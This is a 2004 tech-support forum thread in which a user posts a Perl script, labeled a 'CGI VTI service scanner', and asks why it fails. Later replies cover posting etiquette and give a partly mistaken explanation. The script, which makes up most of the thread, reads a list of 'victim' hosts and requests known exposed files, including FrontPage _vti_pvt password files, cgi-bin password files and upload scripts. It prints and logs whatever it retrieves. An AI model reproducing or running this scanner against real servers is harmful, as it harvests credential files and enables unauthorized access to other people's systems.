Need help with CGI Script

by **c0ldfyr3** » Wed Aug 25, 2004 6:22 pm

okay i have been testing this code for 3 weeks now, and i cant seem to find where the bug is... Maby some one here can help me.

Code: Select all: <html> use strict; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; my $def = new LWP::UserAgent; my @victim; my $userresp; print<<__MENU; NeoErudition Technologies CGI VTI service scanner By: Lawrence http://neoerudition.net __MENU print qq(\n\n\nEnter Y or N to continue. [Y/N]: ); while(1) { chomp($userresp = <STDIN>); if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") { print "Proceeding...\n"; last; } elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") { print "Exiting as requested.\n"; exit; } else { print "Thats not a valid answer. [Y/N]: "; } } print qq(\nWhat file contains the victim address: ); chomp(my $victim=<STDIN>); open(IN, $victim) || die "\nCould not open $victim: $!"; while (<IN>) { $victim[$a] = $_; chomp $victim[$a]; $a++; $b++; } close(IN); $a = 0; print qq(CGI/VTI Scan Initiated..\n); while ($a < $b) { print qq(:: Checking for /_vti_pvt/service.grp\n); my $url="http://$victim[$a]/_vti_pvt/service.grp"; my $request = new HTTP::Request('GET', $url); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/_vti_pvt/service.grp"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &second() } sub second() { print qq(:: Checking for /_vti_pvt/authors.pwd\n); my $url2="http://$victim[$a]/_vti_pvt/authors.pwd"; my $request = new HTTP::Request('GET', $url2); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/_vti_pvt/authors.pwd"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &third() } sub third() { print qq(:: Checking for /cgi-bin/password.txt\n); my $url3="http://$victim[$a]/cgi-bin/password.txt"; my $request = new HTTP::Request('GET', $url3); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/password.txt"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &fourth() } sub fourth() { print qq(:: Checking for /_vti_pvt/service.pwd\n); my $url4="http://$victim[$a]/_vti_pvt/service.pwd"; my $request = new HTTP::Request('GET', $url4); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/_vti_pvt/service.pwd"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &fifth() } sub fifth() { print qq(:: Checking for /_vti_pvt/users.pwd\n); my $url5="http://$victim[$a]/_vti_pvt/users.pwd"; my $request = new HTTP::Request('GET', $url5); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/_vti_pvt/users.pwd"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &sixth() } sub sixth() { print qq(:: Checking for /_vti_pvt/administrator.pwd\n); my $url6="http://$victim[$a]/_vti_pvt/administrator.pwd"; my $request = new HTTP::Request('GET', $url6); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/_vti_pvt/administrator.pwd"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &seventh() } sub seventh() { print qq(:: Checking for /_vti_pvt/administrators.pwd\n); my $url7="http://$victim[$a]/_vti_pvt/administrators.pwd"; my $request = new HTTP::Request('GET', $url7); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/_vti_pvt/administrators.pwd"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &eigth() } sub eigth() { print qq(:: Checking for /cgi-win/uploader.exe\n); my $url8="http://$victim[$a]/cgi-win/uploader.exe"; my $request = new HTTP::Request('GET', $url8); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-win/uploader.exe"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &nineth() } sub nineth() { print qq(:: Checking for /cgi-bin/upload.pl\n); my $url9="http://$victim[$a]/cgi-bin/upload.pl"; my $request = new HTTP::Request('GET', $url9); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/upload.pl"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &tenth() } sub tenth() { print qq(:: Checking for /cgi-bin/whois_raw.cgi?\n); my $url10="http://$victim[$a]/cgi-bin/whois_raw.cgi?"; my $request = new HTTP::Request('GET', $url10); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/whois_raw.cgi?"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &eleventh() } sub eleventh() { print qq(:: Checking for /cgi-bin/passwd\n); my $url11="http://$victim[$a]/cgi-bin/passwd"; my $request = new HTTP::Request('GET', $url11); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/passwd"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &twelth() } sub twelth() { print qq(:: Checking for /cgi-bin/passwd.txt\n); my $url12="http://$victim[$a]/cgi-bin/passwd.txt"; my $request = new HTTP::Request('GET', $url12); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/passwd.txt"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &thirteenth() } sub thirteenth() { print qq(:: Checking for /cgi-bin/password\n); my $url13="http://$victim[$a]/cgi-bin/password"; my $request = new HTTP::Request('GET', $url13); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/password"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &fourteenth() } sub fourteenth() { print qq(:: Checking for /cgi-bin/password.txt\n); my $url14="http://$victim[$a]/cgi-bin/password.txt"; my $request = new HTTP::Request('GET', $url14); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/password.txt"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &fifteenth } sub fifteenth() { print qq(:: Checking for /cgi-bin/handler.cgi\n); my $url15="http://$victim[$a]/cgi-bin/handler.cgi"; my $request = new HTTP::Request('GET', $url15); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/handler.cgi"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &sixteenth } sub sixteenth() { print qq(:: Checking for /cgi-bin/handler\n); my $url16="http://$victim[$a]/cgi-bin/handler"; my $request = new HTTP::Request('GET', $url16); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/handler"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &seventeenth } sub seventeenth() { print qq(:: Checking for /cgi-bin/files.pl\n); my $url17="http://$victim[$a]/cgi-bin/files.pl"; my $request = new HTTP::Request('GET', $url17); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/cgi-bin/files.pl"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &eigtheenth } sub eigtheenth() { print qq(:: Checking for /msadc/Samples/SELECTOR/showcode.asp\n); my $url18="http://$victim[$a]/msadc/Samples/SELECTOR/showcode.asp"; my $request = new HTTP::Request('GET', $url18); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/msadc/Samples/SELECTOR/showcode.asp"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &nineteenth } sub nineteenth() { print qq(:: Checking for /msadc/Samples/selector/showcode.asp\n); my $url19="http://$victim[$a]/msadc/Samples/selector/showcode.asp"; my $request = new HTTP::Request('GET', $url19); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/msadc/Samples/selector/showcode.asp"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } &twentieeth } sub twentieeth() { print qq(:: Checking for /session/adminlogin?\n); my $url20="http://$victim[$a]/session/adminlogin?"; my $request = new HTTP::Request('GET', $url20); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>cgivti.log"); print OUT "\n$victim[$a]/session/adminlogin?"; -close OUT; } else { print qq(Not Vulnerable..\n\n); } $a++; } <>

by **Infinityeye** » Wed Aug 25, 2004 7:23 pm

I don't know much about programming, but, did you close all tags and have <body> tagt etc included in your webpage, also a webpage requires a title tag in the <html> tags.
Try, if you can to run it through a script scanner, maybe Dreamweaver or GoLive can help you out, you could also try to search for a free program, those are on the net.

by **ZeroByte** » Wed Aug 25, 2004 7:34 pm

ok, two things before you do this again.

1. When you put a title on your thread, use something constructive instead of "HELP ME PLZ". Try to have your thread title relflect the subject. Like "Need help with CGI Script".

2. Post your code in the thread using the

Code: Select all

bb script. It looks nicer that way.

I edited you post to show you why.

Thanks

by **ZeroByte** » Wed Aug 25, 2004 7:36 pm

Also, without running this script myself. What is the problem/error you are getting from it?

by **c0ldfyr3** » Thu Aug 26, 2004 3:36 pm

well its supposed to allow a anonomis logions and check to see if any port on you PC is being watched, but all i get is error code 2307756c and then it clses the window.

it is server side script, and it runs in DOS mode...

by **Weaver** » Thu Aug 26, 2004 10:38 pm

c0ldfyr3 wrote:well its supposed to allow a anonomis logions and check to see if any port on you PC is being watched, but all i get is error code 2307756c and then it clses the window.

it is server side script, and it runs in DOS mode...

I am no expert Perl programmer, but that is not what that script does. All that script does is look for an address or name in a file and craft HTTP requests to check and see if certain files/services exist on that address/name. It has nothing to do with ports.

What do you mean by "It is run in DOS mode." ? It is a perl script (even though it is not marked up properly at the top with the #!). And what real problems are you having with it?

Are you familiar with Perl? How are you running the script? What errors is the script giving you? Give us some real information and we'll be glad to help you out.

Thanks.

-Weaver

by **c0ldfyr3** » Fri Aug 27, 2004 12:31 pm

that might be my problem, i an not fimiliar with pearl at all, I recieved it from a friend of mine who cant get it to work either, he said it was a dos based program, maby thats why i get funny errors.....

I am sorry, Perl isn't my feil at all Yet... he will have to wait on it then.....
I was only going by what he said it was supposed to do, and i dont think he know what he is talking about.... well thank you anyway, but if that is perl, then he asked me to do what i have not learned to do yet..

I am really sorry about this...

Technology, Support, and News Forum

Need help with CGI Script

Need help with CGI Script

Who is online